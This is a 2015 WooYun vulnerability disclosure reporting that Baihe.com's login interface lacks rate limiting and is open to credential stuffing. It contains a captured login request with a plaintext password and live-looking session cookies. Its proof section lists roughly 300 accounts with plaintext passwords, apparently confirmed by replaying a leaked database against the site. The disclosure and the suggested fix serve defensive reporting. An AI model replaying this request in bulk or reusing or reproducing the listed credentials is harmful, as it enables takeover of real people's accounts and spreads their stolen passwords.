当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112512

漏洞标题:百合网某接口撞库泄露用户登录凭据(有批量账号证明)

相关厂商:百合网

漏洞作者: 路人甲

提交时间:2015-05-07 10:07

修复时间:2015-05-12 10:08

公开时间:2015-05-12 10:08

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-07: 细节已通知厂商并且等待厂商处理中
2015-05-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

撞库扫号攻击已经是Top 10 Security Risks for 2014之一.撞库以大量的用户数据为基础,利用用户相同的注册习惯(相同的用户名和密码),尝试登陆其它的网站。2011年,互联网泄密事件引爆了整个信息安全界,导致传统的用户+密码认证的方式已无法满足现有安全需求。泄露数据包括:天涯:31,758,468条,CSDN:6,428,559条,微博:4,442,915条,人人网:4,445,047条,猫扑:2,644,726条,178:9,072,819条,嘟嘟牛:13,891,418条,7K7K:18,282,404条,共1.2亿条。不管你的网站密码保护的多好,但是面对已经泄露的账号密码,撞库扫号防御还是一个相当重要的环节。

详细说明:

主站登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号。 登录接口抓包如下:

GET /Getinterlogin/gotoLogin?jsonCallBack=jQuery18309600474163889885_1430910053606&event=3&spmp=4.20.53.225.685&txtLoginEMail=patic@163%2ecom&txtLoginPwd=patic1986&chkRememberMe=0&codeId=&codeValue=&_=1430910121714 HTTP/1.1
Host: my.baihe.com
Proxy-Connection: keep-alive
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Referer: http://my.baihe.com/login
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: accessID=20150506190031335976; cookie_pcc=701%7C%7Cwww.hao123.com%7C%7C%7C%7Chttp%3A//www.hao123.com/; ca_sessionid=300FB84A0D9D40CB84D27C84DCA58958; ca_uid=D44AEC46660743F19F82C24E5C96C48A; ca_ftime=1430910032068; ca_ltime=1430910032068; ca_stime=1430910032068; join_key=D44AEC46660743F19F82C24E5C96C48A_300FB84A0D9D40CB84D27C84DCA58958_1430910032070; ca_se=http%3A//www.hao123.com/; accessToken=BH1430910053750851371; Hm_lvt_5caa30e0c191a1c525d4a6487bf45a9d=1430910032; Hm_lpvt_5caa30e0c191a1c525d4a6487bf45a9d=1430910054; _fmdata=064B772F4E2BCBC400BE34341D6F4DDB929988D183D0175A388F80F24AAE6E6A73F1FA0C376C840441AA1D740809E18A217AACAEF57DEF4C
RA-Ver: 2.10.0
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
Connection: close


漏洞证明:

经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号.

[email protected]	04110826
[email protected] dsl900119
[email protected] 19870126
[email protected] lifeifei10
[email protected] 19861002
[email protected] 51166382003415
[email protected] a121522434
[email protected] wodeweilai
[email protected] kamendeqing1984
[email protected] 19103348
[email protected] 67518335
[email protected] zxg19860326
[email protected] 19830627
[email protected] caohaini
[email protected] 19841210
[email protected] zx850212
[email protected] 63875682
[email protected] catherine
[email protected] j714285xw
[email protected] yang0728
[email protected] yanghu1987
[email protected] 11111111
[email protected] snake_wt
[email protected] 274743523
[email protected] 8491690119
[email protected] cute1986415
[email protected] 19861224
[email protected] vanhalen
[email protected] guyingfeng
[email protected] cgzlctks
[email protected] a19811207
[email protected] 13469847409
[email protected] 055056iori
[email protected] 19840618
[email protected] 1451392
[email protected] 22274135
[email protected] 109523398
[email protected] xhb313926499
[email protected] 19872192418
[email protected] 1988108q
[email protected] 198534dy
[email protected] 64168627
[email protected] 19821127
[email protected] heng1025
[email protected] 19890502asdfg110
[email protected] 110120linliyun
[email protected] 66966720
[email protected] 19620520
[email protected] blood0a0
[email protected] baohua1984
[email protected] 65154193
[email protected] mylizi
[email protected] callifyoumiss
[email protected] shyn1984
[email protected] 19760119
[email protected] 02368209505
[email protected] sun8792011yan
[email protected] jiandotcom
[email protected] 19871118
[email protected] s7wvie7b
[email protected] 62597758
[email protected] 19821224
[email protected] 19841112
[email protected] wj1228
[email protected] 9718966624
[email protected] 12345678
[email protected] dark130320
[email protected] 19820613
[email protected] Br168king
[email protected] lx19891029
[email protected] 79532448
[email protected] amanita626387
[email protected] 1033286hao
[email protected] wonaikuang
[email protected] 153998056ding
[email protected] 19881018
[email protected] shengyuqin
[email protected] 090330226
[email protected] 357357
[email protected] 1027543677
[email protected] 13129860474
[email protected] 123654789
[email protected] huashan54260843
[email protected] 25859626
[email protected] hanfei***
[email protected] chizy0210
[email protected] dawei129
[email protected] wk770630
[email protected] 117111
[email protected] 19820730
[email protected] zhanghan
[email protected] iloveyou
[email protected] 231623xz
[email protected] tony5212129
[email protected] woaimama
[email protected] 19841210
[email protected] cheng911
[email protected] 8416103zj
[email protected] aezy166168
[email protected] Nintendo
[email protected] renyun198877
[email protected] freefree
[email protected] dchao1984
[email protected] zj724jw
[email protected] sunfenglai
[email protected] jxlchf521
[email protected] 111213lr
[email protected] zxa7508318
[email protected] woaishiye
[email protected] 013114810
[email protected] mosquito
[email protected] 12345678
[email protected] 25211119
[email protected] 06199127
[email protected] jg992home
[email protected] 62312371
[email protected] burningma841128
[email protected] 1988602418
[email protected] hjwisatc
[email protected] 32783784
[email protected] dick19890725
[email protected] 19860420
[email protected] 375884312
[email protected] qiannian
[email protected] 8081101381
[email protected] 54byw52jq
[email protected] 66524432
[email protected] cdy515620
[email protected] rlt2880009
[email protected] lbdzjclzq
[email protected] superstar
[email protected] terry277
[email protected] shy861216
[email protected] 5188999iop
[email protected] 751012481
[email protected] 7632511
[email protected] 000000
[email protected] zhaokeyi
[email protected] 52506526
[email protected] gundamyu
[email protected] 800910ding
[email protected] 138165028
[email protected] 19840220
[email protected] 697542
[email protected] wangfengbo
[email protected] viviandbseti
[email protected] chabugle
[email protected] sarahho6823
[email protected] woainiazml
[email protected] ws.t.f.l
[email protected] 840102
[email protected] jamstang
[email protected] thinking123
[email protected] rs791004
[email protected] 19811216
[email protected] 2080346680
[email protected] wuguanru1234
[email protected] zhangxin
[email protected] daerdaolv
[email protected] 56770165
[email protected] hz1989711
[email protected] 22882288
[email protected] 110410714
[email protected] 85798579
[email protected] abcd1234
[email protected] luoyu1989
[email protected] 73366227
[email protected] 7758521sweet
[email protected] 15995882379
[email protected] ying584116558
[email protected] 19840330
[email protected] lsntracy
[email protected] q62531298
[email protected] 13978697546
[email protected] sun3234084
[email protected] kele0628
[email protected] lhg123456
[email protected] roval880223
[email protected] zwwczx060817
[email protected] marseille
[email protected] 4206827H
[email protected] 402800665
[email protected] 5201314
[email protected] sting000
[email protected] 44793355
[email protected] 677679
[email protected] lijing
[email protected] 44012673
[email protected] 131420
[email protected] ainibubian
[email protected] lxr4renxian7
[email protected] 280094589
[email protected] 13161252188
[email protected] 19861107
[email protected] 520131421
[email protected] 86582417
[email protected] 3501281981
[email protected] 13086250068
[email protected] 2336110
[email protected] yjtfqihc
[email protected] jordan23
[email protected] 7788qing
[email protected] 790915
[email protected] 820818ok
[email protected] 57466432
[email protected] 545102325
[email protected] guangzhimie
[email protected] bkr54127
[email protected] 89524292
[email protected] 68086390
[email protected] music123
[email protected] zn3358255
[email protected] 397119632
[email protected] wn19900809
[email protected] 19821220
[email protected] 19880118
[email protected] liuyajing
[email protected] jiayongku
[email protected] kenfanx
[email protected] 1q2w3e4r
[email protected] 198188
[email protected] 15152615
[email protected] 527862ccf
[email protected] 12345678
[email protected] jjc112358
[email protected] 273400
[email protected] huang0016
[email protected] 19871124
[email protected] 310930ls
[email protected] 16800123
[email protected] asdfdsasaa
[email protected] loving51
[email protected] imissyou
[email protected] xy123456
[email protected] Qsc!152216
[email protected] woaiziji
[email protected] 961114427wzl
[email protected] 1980392008
[email protected] 11111111
[email protected] accessorieslj103
[email protected] 043612
[email protected] 67456387
[email protected] 7777777777
[email protected] 19830417
[email protected] 19831014
[email protected] 781006
[email protected] 780228
[email protected] 19850115
[email protected] 19821224
[email protected] laotou0021379
[email protected] qq123456
[email protected] 19870722124
[email protected] liuzhe123
[email protected] 13564143501
[email protected] 800408gd
[email protected] zl2726002
[email protected] yutaotjs
[email protected] hf6205341
[email protected] 19831208
[email protected] yaojunwei
[email protected] zzzzzz
[email protected] 46144255
[email protected] 68460017
[email protected] 19730913
[email protected] jccg1000
[email protected] 14941797
[email protected] 22048682
[email protected] 2002195255
[email protected] 19880818
[email protected] 19810101
[email protected] 2114009217
[email protected] feiyang47
[email protected] 7856391zf
[email protected] 1314521jalis
[email protected] 750614
[email protected] 123123123
[email protected] 2525775
[email protected] alex7676
[email protected] 52199999
[email protected] jiang8853007
[email protected] 19821547
[email protected] 12344321
[email protected] 13824042929
[email protected] 712307
[email protected] 1415926
[email protected] 89215439
[email protected] 17031703
[email protected] 85100617


屏幕快照 2015-05-06 下午7.51.34.png


屏幕快照 2015-05-06 下午7.34.46.png


修复方案:

撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-12 10:08

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无